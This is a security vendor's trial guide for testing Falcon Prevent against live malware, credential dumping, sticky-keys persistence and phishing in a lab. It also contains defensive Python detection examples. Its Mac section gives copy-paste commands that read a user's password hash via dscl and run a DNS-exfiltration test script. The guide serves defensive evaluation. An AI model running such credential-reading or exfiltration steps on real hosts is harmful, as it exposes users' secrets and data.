
Malware and Advanced Attack Testing

Your Falcon trial allows you to test malware samples and advanced attack techniques. This is an optional step for your evaluation, demonstrating how Falcon Prevent protects your environment.

Step-by-step instructions

Estimated Time

20 mins depending on the amount of testing you wish to conduct.

Requirements

Typical device, Mac or Windows OS and Google Chrome browser

Windows

In this next section you will walk through testing scenarios with actual malware. You should NOT conduct these tests on your laptop or workstation, but rather in a dedicated malware testing environment. To facilitate this, the CloudShare virtual environment ensures that malware testing happens completely outside of your organization. The lab and this guide focus solely on Falcon Prevent which is our anti-virus solution.

1. Accessing the cloud-based malware lab

  • If you already have your own malware lab setup, skip this step and proceed with step 2.

Cloudshare is a cloud-based Windows lab environment where you can safely conduct live tests. If you already have a secure malware testing lab, you can also test Falcon Prevent there. The steps in this guide are written to allow testing in our lab or in yours.

  • Together with your confirmation email for the Falcon Prevent Free Trial, you also received an email from cloudshare.com.
  • Click on the link in the email and follow the signup instructions to leverage our hosted lab environment.
  • Click on the Malware Lab tab to access your test machine.

  • When you access it for the first time, click on the Download Samples icon on the Desktop.
  • A script will retrieve recent malware, ransomware and even script-based attacks and put them into the Sample Files folder on your desktop.

This process might take a few minutes to complete. Feel free to minimize the download window and proceed with the sensor download and install from step 2.

2. Lab Preparation

  • Download and install the Falcon sensor.
  • As you begin testing, either in your own lab or in the provided virtual environment, a sensor must be downloaded and installed on each test host.
  • For sensor installation, please refer to Essential steps > Installation.

  • Verify the active prevention policy.
  • To test efficacy, the newly installed sensor must have a prevention policy assigned.
  • You can confirm this in the Falcon Interface: go to Host Management and verify that your hostname is listed. The Prevention Policy column should show platform_default as the assigned policy.
  • Run the CrowdStrike prevention test file (step 3) to validate that the policy has been applied correctly; it generates a detection event. Switch back to the Falcon Interface and go to Detections to inspect the new alert.

3. Non-Malicious test

  • Go to Desktop > Sample Files > Non-Malicious and execute cs_maltest.exe.
  • With prevention enabled, you will see a message similar to the one below on the client system.
  • This will also generate a detection event in the Falcon Interface.

Once you have the sensor installed with prevention policies enabled, you are ready to test with live samples. You can choose from the following tests: Malware | Ransomware | PowerShell | Persistence | Phishing Attack | Application Management.

4. Malware

  • Once you have the sensor installed with prevention policies enabled, you can begin testing with actual malware.
  • In the malware lab, navigate to Sample Files > Malware from the desktop.
  • We have provided about 25 different malware samples. Use these samples to generate detection events in the Falcon Interface.

  • Run a malware sample from Windows Explorer by double-clicking it.
  • Now navigate back to the Falcon Interface and notice that explorer.exe is the parent process in the process tree.
  • This helps you understand how an attack was executed.

  • Run a sample from a command prompt (cmd.exe). The parent process is now cmd.exe instead of explorer.exe.

  • Use HxD Hex Editor (already installed in the malware lab) to modify the file and change its hash.

  • Then run the modified sample to see that Falcon Prevent can block unknown malware.

5. Ransomware

  • In recent years, ransomware has emerged as one of the most prevalent and problematic malware types.
  • We have collected recent samples of prominent ransomware families like Locky and WannaCry and made them available in your lab.
  • To access them, go to Desktop > Sample Files > Ransomware.
  • Feel free to run any of these ransomware files and see how Falcon Prevent provides complete protection against them.

6. PowerShell

  • Navigate to Desktop > Sample Files > IOAs-Behavioral.
  • Double-click the Credential_Dumping.bat batch file. This script runs an encoded PowerShell command to capture credentials.

  • Navigate to the Falcon Interface Detections page and inspect the new detection.
  • Notice that the full command line parameters are available in the execution details pane.
  • In this alert, the process tree immediately shows us that PowerShell was run from a command prompt, that it was identified as Mimikatz, an LSASS process was accessed, and that the command was encoded.
  • On the right in the Execution Details, we can see the full command line argument that was used. No other AV solution provides that level of detail.

CrowdStrike Falcon uses an Indicator of Attack (IOA) to represent a series of actions that an attacker must conduct during a successful attack. IOAs are concerned with the execution of these steps, the intent of the adversary, and the outcomes that adversary is trying to achieve. This allows Falcon Prevent to identify and block new and unknown threats based on the tactics, techniques, and procedures used by the attacker.

7. Persistence

  • Navigate to Desktop > Sample Files > IOAs-Behavioral.
  • Double-click the Sticky_Keys.bat batch file. The file will run in a command prompt window.
  • It will secretly modify a registry key that would allow an attacker to log in to the machine without ever having to provide a username or password.

  • Now use the “send ctrl+alt+delete” button on the left-hand side of your malware lab screen to bring up the Windows lock screen.

  • Click on the Ease of Access option in the lower left-hand corner. On the screen that pops up, check the box for Type without the keyboard (On-Screen Keyboard), then hit Apply.

Without Falcon Prevent on this system, a command prompt would have appeared, giving the attacker full system access (NT AUTHORITY\SYSTEM). This is an example of attacker behavior that does not use malware and is commonly missed by legacy AV solutions. Falcon Prevent stopped this persistence mechanism even though no malware was used.

  • Cancel out of the Windows lock screen and switch back to the Falcon Interface.
  • You will find a new, critical alert under Detections.
  • By expanding the new alert, we can see that cmd.exe was prevented from launching with system privileges and from bypassing the Windows logon process.

In both of these examples, no malware was used. These are examples of file-less attacks. Falcon Prevent identified a behavior that was suspicious and protected the user. This is an example of the power of IOAs. IOAs identify malicious behavior – no matter how it is delivered.


8. Phishing Attack

  • In this scenario we will simulate a phishing attack by opening an email with a malicious attachment.
  • In the malware lab, open Outlook and find our prepared email in the inbox. This phishing attack claims that the user has unpaid charges from a hotel stay.
  • To learn more, open the attachment by double-clicking Folio-0701-2017-00873.xls.

  • After you open the attached Excel file, a Visual Basic error message appears.
  • This indicates that Falcon Prevent has stopped the document from executing its malicious payload in the background.

  • Opening the attachment triggered a new alert in the Falcon Interface.
  • Expanding the new alert clearly illustrates that this threat came from Outlook.exe and that the Excel attachment launched PowerShell.
  • To get even more details as to what PowerShell did, the Execution Details pane shows that PowerShell attempted to run a hidden command and download our malicious script from GitHub.
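The two detections described above, the encoded PowerShell launched from cmd.exe in the PowerShell section and the Outlook > Excel > PowerShell chain here, come down to a handful of fields in the process event. As an added example that is not CrowdStrike's code, the Python below decodes an -EncodedCommand argument (base64 of the script as UTF-16LE) and derives the indicators an analyst reads off the Execution Details pane: encoded command, hidden window, no profile, Office ancestry, and a download cmdlet in the decoded script. The events, payloads, field names and scoring are constructed for the example.

```python
import base64

# Added example (not CrowdStrike code). Events below are constructed to mirror the guide's
# scenarios; "ancestry" and "cmdline" are hypothetical field names, and the encoded payloads
# are built from harmless strings so the example runs offline.

OFFICE_APPS = {"outlook.exe", "excel.exe", "winword.exe", "powerpnt.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile", "net.webclient")


def encode_ps(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the script encoded as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse of encode_ps; restores '=' padding that a trimmed command line may have lost."""
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def _is_param(token: str, name: str, min_prefix: int) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name (-enc, -w, -nop ...)."""
    t = token.lstrip("-/").lower()
    return len(t) >= min_prefix and name.startswith(t)


def triage(event: dict) -> dict:
    """Return the indicators visible in one process event plus a simple count as a score."""
    tokens = event["cmdline"].split()  # constructed command lines carry no quoted arguments
    findings = {
        "encoded": False, "hidden_window": False, "no_profile": False,
        "office_ancestor": False, "download_in_script": False, "decoded_script": None,
    }
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if _is_param(tok, "encodedcommand", 1) and nxt:
            findings["encoded"] = True
            try:
                findings["decoded_script"] = decode_ps(nxt)
            except ValueError:  # not base64 / not UTF-16LE: still worth an analyst's look
                findings["decoded_script"] = None
        elif _is_param(tok, "windowstyle", 1) and nxt.lower().startswith("h"):
            findings["hidden_window"] = True
        elif _is_param(tok, "noprofile", 3):
            findings["no_profile"] = True
    findings["office_ancestor"] = any(a.lower() in OFFICE_APPS for a in event["ancestry"])
    script = (findings["decoded_script"] or "").lower()
    findings["download_in_script"] = any(m in script for m in DOWNLOAD_MARKERS)
    findings["score"] = sum(findings[k] for k in ("encoded", "hidden_window", "no_profile",
                                                  "office_ancestor", "download_in_script"))
    return findings


EVENTS = [  # constructed, modelled on the guide's scenarios
    {"ancestry": ["explorer.exe", "cmd.exe"],
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_ps("Write-Output 'constructed credential-dumping stand-in'")},
    {"ancestry": ["OUTLOOK.EXE", "EXCEL.EXE"],
     "cmdline": "powershell.exe -WindowStyle Hidden -EncodedCommand "
                + encode_ps("Invoke-WebRequest https://placeholder.invalid/constructed.ps1")},
    {"ancestry": ["explorer.exe"],  # an ordinary admin script for contrast
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        r = triage(ev)
        print(ev["ancestry"], "score", r["score"], "decoded:", r["decoded_script"])
```

The prefix matching in `_is_param` is what makes `-enc`, `-e` and `-EncodedCommand` equivalent, which is why a detection keyed on the literal string `-EncodedCommand` alone is easy to miss; decoding the argument rather than pattern-matching the command line is the robust approach.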

9. Application Management

Falcon Prevent allows you to manually block or allow applications based on your organization’s unique needs.

  • Navigate to Desktop > Sample Files > Non-Malicious.
  • Double-click and run the Show_a_Hash.exe application.
  • This application does nothing more than show its own file hash in a command prompt.
  • We will use that hash to blacklist the file and prevent it from running again.
  • Copy the hash from the Command Prompt or from here: 4e106c973f28acfc4461caec3179319e784afa9cd939e3eda41ee7426e60989f

  • In the Falcon Interface, navigate to Prevention Hashes.
  • On the right-hand side, click the upload hashes icon.

  • Then paste the hash into the window and select Apply.

  • In the next window, select the action Always Block and select Apply again.

  • Navigate back to the Desktop (close the command prompt window), then double-click Show_a_Hash.exe again and notice that it does not run this time.
  • In the Falcon Interface, navigate to Detections and inspect the new alert.

Managing your hash policy can be done directly from a detection. This means, if a detection is created for a malicious file, it can immediately be added to the blacklist using the “Execution Details” pane on the right of the selected alert. Simply click the “Update Hash Policy” button for the selected hash and make changes. The same is true if a custom application is causing false alerts and needs to be added to the whitelist.
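The hash policy above and the hex-editor step in the Malware section are two sides of the same mechanism. The added Python below (not CrowdStrike code) computes SHA-256 values, parses a pasted hash list such as the one used above, applies an Always Block rule, and then shows that a one-bit change to the file yields a hash the rule no longer matches, which is why hash blocking is a policy tool for known files and the behavioral layer is what covers unknown malware. The sample bytes, the HashPolicy class and the flip_byte step are constructed for the example; the hash constant is the one printed above.

```python
import hashlib

# Added example (not CrowdStrike code): the mechanics behind a per-hash block policy.
# SAMPLE is a constructed stand-in for Show_a_Hash.exe; PAGE_HASH is the hash the guide prints.

PAGE_HASH = "4e106c973f28acfc4461caec3179319e784afa9cd939e3eda41ee7426e60989f"
SAMPLE = b"MZ" + b"constructed stand-in for Show_a_Hash.exe\x00" * 3


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_hash_list(text: str) -> set:
    """Hashes as pasted into the upload window: one per line, any case, blanks ignored."""
    hashes = set()
    for line in text.splitlines():
        h = line.strip().lower()
        if not h or h.startswith("#"):
            continue
        if len(h) != 64 or any(c not in "0123456789abcdef" for c in h):
            raise ValueError(f"not a SHA-256 hex digest: {line.strip()!r}")
        hashes.add(h)
    return hashes


class HashPolicy:
    """Constructed stand-in for a per-hash action table (actions: 'block' or 'allow')."""

    def __init__(self):
        self.actions = {}

    def add(self, pasted: str, action: str) -> None:
        if action not in ("block", "allow"):
            raise ValueError(f"unknown action {action!r}")
        for h in parse_hash_list(pasted):
            self.actions[h] = action

    def decide(self, data: bytes) -> str:
        """Look the file up by its hash; anything unlisted gets no hash-based verdict."""
        return self.actions.get(sha256_hex(data), "no-rule")


def flip_byte(data: bytes, offset: int) -> bytes:
    """Copy of data with one bit changed, the hex-editor edit from the Malware section."""
    buf = bytearray(data)
    buf[offset] ^= 0x01
    return bytes(buf)


def demo() -> dict:
    policy = HashPolicy()
    # Upper-case paste exercises the normalisation; both hashes become Always Block rules.
    policy.add(sha256_hex(SAMPLE).upper() + "\n" + PAGE_HASH, "block")
    modified = flip_byte(SAMPLE, len(SAMPLE) // 2)
    return {
        "original": policy.decide(SAMPLE),       # blocked: hash is on the list
        "modified": policy.decide(modified),     # no rule: one bit changed, new hash
        "hashes_differ": sha256_hex(SAMPLE) != sha256_hex(modified),
        "rules": len(policy.actions),
    }


if __name__ == "__main__":
    print(demo())
```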

Mac

These commands will make temporary changes to the machine in order to demonstrate real-world examples. However, they do not use live malware. You can also conduct testing scenarios with actual malware in the Windows-based CloudShare virtual environment; the guide for that can be found under the Windows tab.

1. Defense Evasion Techniques

This detection illustrates Falcon’s ability to respond to malicious behaviors with IOAs. An Indicator of Attack (IOA) represents a series of actions that an application or adversary must conduct during a successful attack. IOAs are concerned with the execution of these steps, the intent of the adversary and the outcomes that adversary is trying to achieve. This is superior to using Indicators of Compromise (IOCs) or signatures because it allows Falcon Prevent to block new and unknown threats. This specific command makes a copy of whoami with a .pdf extension and then executes it. Changing the extension of an existing tool will trigger a Falcon detection for masquerading. The command ends by removing the file, so no additional clean-up or reversal is needed.

  • Open a terminal.
  • Type or copy and paste this command:
    cd ~/Desktop; cp /usr/bin/whoami whoami.pdf; ./whoami.pdf; rm whoami.pdf

  • Next, go to the Falcon UI and navigate to Activity > Detections. You should see a new alert, which indicates that the malicious activity was detected.
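The masquerading detection above rests on a mismatch between what a file claims to be (its .pdf extension) and what it actually is (a Mach-O executable). As an added example that is not CrowdStrike's own logic, the Python below reads a file's leading bytes, identifies the real format from its magic number, and flags an executable that carries a document extension. The magic table, the extension list and the sample headers are assumptions constructed for the example; scan_file runs the same check on a real path.

```python
import os

# Added example (not CrowdStrike code): extension-versus-content check for masquerading.
# The magic table and document-extension list are assumptions; sample headers are constructed.

MAGICS = [  # (leading bytes, format, is it executable code?)
    (b"\xcf\xfa\xed\xfe", "Mach-O 64-bit", True),
    (b"\xce\xfa\xed\xfe", "Mach-O 32-bit", True),
    (b"\xfe\xed\xfa\xcf", "Mach-O 64-bit big-endian", True),
    (b"\xfe\xed\xfa\xce", "Mach-O 32-bit big-endian", True),
    (b"\xca\xfe\xba\xbe", "Mach-O universal (same magic as Java class files)", True),
    (b"\x7fELF", "ELF", True),
    (b"MZ", "PE/DOS", True),
    (b"%PDF-", "PDF", False),
    (b"\x89PNG", "PNG", False),
    (b"PK\x03\x04", "ZIP container (docx/xlsx and friends)", False),
]
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png", ".rtf"}


def identify(header: bytes) -> tuple:
    """Map leading bytes to (format name, executable flag); unknown if no magic matches."""
    for prefix, fmt, executable in MAGICS:
        if header.startswith(prefix):
            return fmt, executable
    return "unknown", False


def is_masquerading(path: str, header: bytes) -> bool:
    """True when executable code hides behind a document-style extension (whoami.pdf)."""
    ext = os.path.splitext(path)[1].lower()
    _fmt, executable = identify(header)
    return executable and ext in DOCUMENT_EXTS


def scan_file(path: str) -> dict:
    """Apply the check to a real file by reading only its first eight bytes."""
    with open(path, "rb") as f:
        header = f.read(8)
    fmt, _ = identify(header)
    return {"path": path, "format": fmt, "masquerading": is_masquerading(path, header)}


CONSTRUCTED = {  # sample headers, not real files
    "whoami.pdf": b"\xcf\xfa\xed\xfe\x07\x00\x00\x01",   # Mach-O behind a .pdf name
    "report.pdf": b"%PDF-1.7\n",                          # a genuine PDF
    "/usr/bin/whoami": b"\xcf\xfa\xed\xfe\x07\x00\x00\x01",  # executable with no document extension
    "photo.jpg": b"MZ\x90\x00\x03\x00\x00\x00",            # PE behind an image name
}

if __name__ == "__main__":
    for name, header in CONSTRUCTED.items():
        print(name, identify(header)[0], "masquerading" if is_masquerading(name, header) else "ok")
```

A magic-byte check is cheap enough to run on every file-create or execute event; the residual gap is files whose content is itself a script or container, which is why the universal-binary magic is annotated as ambiguous and why such a check complements, rather than replaces, behavioral detection.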

2. Credential Theft Detect

This detection is another example of Falcon’s use of IOAs. Credential access represents techniques resulting in access to or control over system, domain, or service credentials that are used within an enterprise environment. Adversaries will likely attempt to obtain legitimate credentials from users or administrator accounts (local system administrator or domain users with administrator access) to use within the network. This allows the adversary to assume the identity of the account, with all of that account’s permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.

Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear-text password, from the operating system and software. Credentials can then be used to perform lateral movement and access restricted information. The command listed below queries the ‘shadowhash’ for a user via the terminal. This command could be used on a macOS host to gather information used to decrypt passwords. No clean-up is needed on the system after executing this command.

  • Open a terminal.
  • Type or copy and paste this command:
    sudo dscl . read /Users/$USER dsAttrTypeNative:ShadowHashData

  • Switch back to the Falcon UI and go to Activity > Detections and see that there is a new Prevention event with the Tactic & Technique Credential Access via Credential Dumping.
  • The green checkmark indicates that this activity was successfully blocked.

3. DNS Exfil Block

This detection is another example of Falcon’s use of IOAs. Data exfiltration (aka “data extrusion”) is the unauthorized transfer of data from a host. The transfer can be done manually by someone with physical access, or automated and carried out through malware over a network. The script used below shows the transfer (exfiltration) of a fake file over a DNS request covert channel.

  • For the next example, you will need to download a script file that helps illustrate data exfiltration. The script creates ten temporary files, zips them into one package and outputs a hex dump of those files. It removes all of the temporary files so that no additional clean up is required following the test.
  • To download the file go to the following link. Click Download in the top right corner of the window.
  • Set permissions on the script by navigating to the directory where the script is stored and run the following command to set executable permissions. (The example shown specifies the default “Downloads” folder.)
    chmod +x dns-exfil.sh

  • In the same window, run the command below to execute the script.
    ./dns-exfil.sh
  • You will see additional activity in the terminal window as the script runs.
  • After the script runs successfully, you can close the terminal session.

  • Switch back to the Falcon UI and go to Activity > Detections and see that there is a new Prevention event with the Tactic & Technique Exfiltration via Exfiltration Over Alternative Protocol.
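The covert channel the script exercises leaves a recognisable trace on the resolver side: a burst of distinct, hex-looking subdomains under one domain, each label carrying a chunk of the hex dump. As an added example that is not CrowdStrike's detection logic, the Python below runs that check over constructed DNS query-log lines, grouping queries by domain, measuring the share of hex labels and the number of unique subdomains, and estimating the bytes carried. The log layout ("timestamp client qname qtype"), the thresholds and the two-label notion of a registrable domain are assumptions.

```python
import re
from collections import defaultdict

# Added example (not CrowdStrike code): flag DNS exfiltration over hex-encoded subdomains.
# Log line layout "<timestamp> <client> <qname> <qtype>", the thresholds and the sample
# lines are all constructed assumptions for this example.

HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")


def parse_line(line: str) -> dict:
    ts, client, qname, qtype = line.split()
    return {"ts": ts, "client": client, "qname": qname.lower().rstrip("."), "qtype": qtype}


def analyze(lines, min_queries: int = 8, min_hex_ratio: float = 0.6) -> dict:
    """Return {domain: stats} for domains whose subdomains look like encoded data chunks."""
    by_domain = defaultdict(list)
    for line in lines:
        labels = parse_line(line)["qname"].split(".")
        domain = ".".join(labels[-2:])   # simplification: registrable domain = last two labels
        by_domain[domain].append(labels[:-2])
    alerts = {}
    for domain, subs in by_domain.items():
        if len(subs) < min_queries:      # too few queries to judge
            continue
        hex_labels = [s[0] for s in subs if s and HEX_LABEL.match(s[0])]
        ratio = len(hex_labels) / len(subs)
        unique = {".".join(s) for s in subs}
        # Many distinct hex labels to one domain is the chunked-upload pattern; a normal
        # domain repeats a small set of readable hostnames instead.
        if ratio >= min_hex_ratio and len(unique) >= min_queries:
            alerts[domain] = {
                "queries": len(subs),
                "unique_subdomains": len(unique),
                "hex_ratio": round(ratio, 2),
                "approx_bytes": sum(len(h) for h in hex_labels) // 2,  # two hex chars per byte
            }
    return alerts


def constructed_lines() -> list:
    """Constructed log: ten hex chunks to one domain (like the ten files the script hex-dumps)
    plus eight ordinary lookups that must not alert."""
    lines = []
    for i in range(10):
        chunk = "".join("%02x" % ((i * 37 + j) % 256) for j in range(16))
        lines.append(f"2024-05-01T09:00:{i:02d}Z 10.0.0.5 {chunk}.exfil-test.invalid TXT")
    for i, host in enumerate(["www", "mail", "cdn", "static", "api", "login", "img", "docs"]):
        lines.append(f"2024-05-01T09:01:{i:02d}Z 10.0.0.5 {host}.example.com A")
    return lines


if __name__ == "__main__":
    for domain, stats in analyze(constructed_lines()).items():
        print(domain, stats)
```

On real resolver logs the domain grouping should use a public-suffix list rather than the last two labels, and the thresholds need tuning against the site's own baseline (CDNs and some telemetry services legitimately generate long, opaque subdomains).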

Need help?

If you have any questions, reach out and we'll be in touch soon.

TAKE-AWAYS

In the previous sections, we have seen that Falcon Prevent is lightweight and easy to install and manage.

In this section, we saw that Falcon Prevent can protect users from all types of attacks; from the commodity malware attack to more complex phishing. We have even seen Falcon prevent tactics that are typically indicative of targeted attacks that leverage tools like PowerShell.

Being fast, simple, and effective is great, but if the solution doesn’t provide ways to easily handle alerts and triage events you only trade one problem for another.

Was This Section Helpful?

Your feedback is highly appreciated and will help us to improve our ability to serve you and other users of our web sites. Please send feedback about this section of the trial guide to falcontrial@crowdstrike.com.